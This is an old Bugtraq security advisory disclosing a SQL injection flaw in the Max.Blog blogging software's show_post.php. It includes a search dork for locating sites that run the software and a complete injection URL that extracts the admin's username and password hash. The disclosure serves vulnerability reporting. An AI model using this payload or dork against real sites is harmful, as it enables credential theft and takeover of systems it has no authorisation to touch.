Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Tue, 27 Jan 2009 16:27:06 +0100
################### Salvatore "drosophila" Fresta ###################
Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 20 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
############################################################################
- BUGS
SQL Injection:
File affected: show_post.php
This bug allows a guest to view the username and password (MD5 hash) of
the registered user with the specified id (usually 1 for the admin):
http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23
############################################################################
--
Salvatore "drosophila" Fresta
CWNP444351